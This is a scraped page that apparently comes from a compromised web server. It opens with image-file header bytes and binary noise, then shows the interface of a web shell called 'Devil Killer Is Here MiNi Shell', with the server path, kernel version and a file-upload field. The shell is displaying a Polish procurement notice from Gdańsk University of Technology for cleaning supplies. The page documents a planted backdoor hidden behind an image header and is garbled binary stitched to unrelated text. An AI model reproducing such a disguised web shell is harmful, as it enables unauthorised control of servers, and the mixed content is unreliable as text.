JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220609/0020257501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa środków chemii gospodarczej dla jednostek organizacyjnych Politechniki gdańskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Gdańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 11/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@pg.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pg.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa środków chemii gospodarczej dla jednostek organizacyjnych Politechniki gdańskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e086b261-e7ea-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00202575</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pg_edu. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pg_edu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu platformy zakupowej https://platformazakupowa.pl/pn/pg_edu oraz poczty<br/>elektronicznej.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia lub znakiem postępowania.<br/>Zamawiający wyznaczył następujące osoby do kontaktu z Wykonawcami: Marcin Kasperowicz , email:<br/>dzp@pg.edu.pl<br/>Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem<br/>formularza “Wyślij wiadomość”, nie za pośrednictwem adresu email.<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania Zamawiający preferuje, aby komunikacja<br/>między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje, przekazywane były w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij<br/>wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień<br/>oraz informacji Zamawiający uzna datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie<br/>przycisku „Wyślij wiadomość” po których pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego.<br/>9. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do<br/>konkretnego wykonawcy.<br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny<br/>czas(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE. L. z 2016 r.<br/>nr 119, str. 1; zm.: Dz. U. UE.L. z 2018 r. Nr 127, str. 2), dalej „RODO”, Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Politechnika Gdańska z siedzibą w 80-233<br/>Gdańsk przy ul. G. Narutowicza 11/12;<br/>b) inspektorem ochrony danych osobowych w Politechnice Gdańskiej jest mgr inż. Paweł Baniel, tel.<br/>+48 58 348-66-29, e-mail: iod@pg.edu.pl;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego nr ZP/ 156/055/D/22 pn.<br/>Sukcesywna dostawa środków chemii gospodarczej dla jednostek organizacyjnych Politechniki<br/>Gdańskiej prowadzonym w trybie podstawowym bez negocjacji;<br/>c) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 29 stycznia 2004 r. – Prawo<br/>zamówień publicznych;<br/>d) Pani/Pana dane osobowe będą przechowywane przez okres co najmniej 4 lata od dnia zakończenia<br/>postępowania;<br/>e) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>f) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>g) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>h) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dodatkowo, stosownie do art. 19 ust. 4 ustawy Pzp,<br/>Zamawiający informuje o ograniczeniach, o których mowa w art. art. 19 ust. 2 i 3 oraz 75 ustawy Pzp::<br/>1)w przypadku, gdy Wykonawca skorzysta z prawa do uzyskania potwierdzenia, czy przetwarzane są<br/>dotyczące go dane osobowe, to Zamawiający będzie uprawniony do żądania od Wykonawcy<br/>dodatkowych informacji precyzujących żądanie (np. nazwy lub daty postępowania o udzielenie<br/>zamówienia);<br/>2)w przypadku, gdy Wykonawca skorzysta z prawa do ograniczenia przetwarzania jego danych<br/>osobowych, to Zamawiający będzie uprawniony do przetwarzania tych danych do czasu zakończenia<br/>postępowania o udzielenie zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/156/055/D/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 296631,06 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa środków chemii gospodarczej dla jednostek organizacyjnych Politechniki Gdańskiej wg szczegółowego opisu zawartego w załączniku nr 3 do SWZ - formularz rzeczowo-cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24960000-1 - Różne produkty chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert odbędzie się na podstawie kryteriów określonych w rozdziale XIV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">58</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">42</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.<br/> U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - oświadczenie stanowi załącznik nr 5 do SWZ.<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga, by wykonawca złożył wraz z ofertą, przedmiotowe środki dowodowe.<br/><br/>Przedmiotowe środki dowodowe winny zawierać informacje (cechy, parametry) stanowiące podstawę do przyznania punktów w kryteriach oceny ofert, o których mowa w rozdziale XIV SWZ. Ponadto karty charakterystyki złożone wraz z ofertą do pozycji wymaganych winny potwierdzać spełnianie przez zaoferowany produkt parametry wyspecyfikowane w kolumnie nr 3 w załączniku nr 3 do SWZ. <br/><br/> <br/> • Kartę charakterystyki Mleczka do czyszczenia z wybielaczem o (pozycja 6 w formularzu <br/> rzeczowo-cenowym)<br/>•	Kartę charakterystyki oraz certyfikat Ecolabel lub równoważny płynu do mycia podłóg (pozycja 11 w formularzu rzeczowo-cenowym)<br/>•	Karty charakterystyki oraz certyfikaty Ecolabel lub równoważne płynów do mycia naczyń (pozycja 12 i 13 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki oraz certyfikat Ecolabel lub równoważny płynu do mycia szyb okiennych w rozpylaczu (pozycja 14 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki płynu do mycia powierzchni kuchennych (pozycja 15 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki środka do ochrony i nabłyszczania paneli, linoleum (pozycja 16 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki skoncentrowanego płynu / żelu czyszcząco - dezynfekującego (pozycja 17 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki środka płynnego do mycia łazienek, kabin prysznicowych, armatury (pozycja 19 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki żelu do czyszczenia WC (pozycja 20 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki żelu do udrażniania rur (pozycja 25 w formularzu rzeczowo-cenowym)<br/>•	Kartę charakterystyki płyn do mycia powierzchni ze stali nierdzewnej, m.in. w windach (pozycja 34 w formularzu rzeczowo-cenowym);<br/>•	Kartę charakterystyki płynu do czyszczenia zmywarek (pozycja 51 w formularzu rzeczowo-cenowym);<br/>•	<br/>2.	Karty charakterystyki, o których mowa powyżej muszą być opisane w następujący sposób: nazwa i adres wykonawcy, numer pozycji formularza rzeczowo – cenowego.<br/>3.	Niezłożenie wraz z ofertą kart charakterystyki oraz certyfikatów Ecolab, o których mowa w punkcie 1 powyżej będzie skutkować odrzuceniem oferty <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia, a oferta taka<br/>spełniać musi następujące wymagania:<br/>1) Wykonawcy muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>2) wypełniając Formularz oferty, jak również inne dokumenty powołujące się na „Wykonawcę”; w<br/>miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane Wykonawców wspólnie<br/>ubiegających się o zamówienie,<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie odpowiadają za<br/>Ogłoszenie nr 2021/BZP 00337636/01 z dnia 2021-12-30<br/>2021-12-30 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>podpisanie i wykonanie umowy,<br/>4) w ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z<br/>Pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka<br/>korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako Pełnomocnik,<br/>5) przed podpisaniem umowy (w przypadku wyboru oferty), Wykonawcy składający ofertę<br/>wspólną będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej ich<br/>współpracę,<br/>6) w odniesieniu do wymagań postawionych przez Zamawiającego każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia oddzielnie musi udokumentować, że nie<br/>podlega wykluczeniu - każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego składa oświadczenie, o którym mowa w rozdziale 2 SWZ<br/>7) sposób składania dokumentów w ofercie wspólnej:<br/>a) dokumenty dotyczące własnej firmy składa każdy z Wykonawców składających ofertę<br/>wspólną w imieniu swojej firmy,<br/>b) dokumenty wspólne takie jak np. formularz oferty- składa Pełnomocnik Wykonawców w<br/>imieniu wszystkich Wykonawców składających ofertę wspólną, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2. Strony dopuszczają możliwość zmiany postanowień umowy w następujących sytuacjach:<br/>1)	zmiana obowiązujących stawek podatkowych, Wykonawca jest uprawniony złożyć Zamawiającemu pisemny wniosek o zmianę Umowy w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług. W tym przypadku wartość ceny netto nie zmieni się, a jedynie wartość ceny brutto zostanie wyliczona na podstawie nowych przepisów;<br/>2)	zmiana nazw i innych danych identyfikacyjnych stron umowy, <br/>3)	wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia, <br/>4)	zmiana warunków realizacji umowy, w szczególności w okolicznościach wskazanych w § 6 ust. 14 umowy,<br/>5)	w przypadku, gdy w terminie wskazanym w § 2 umowy 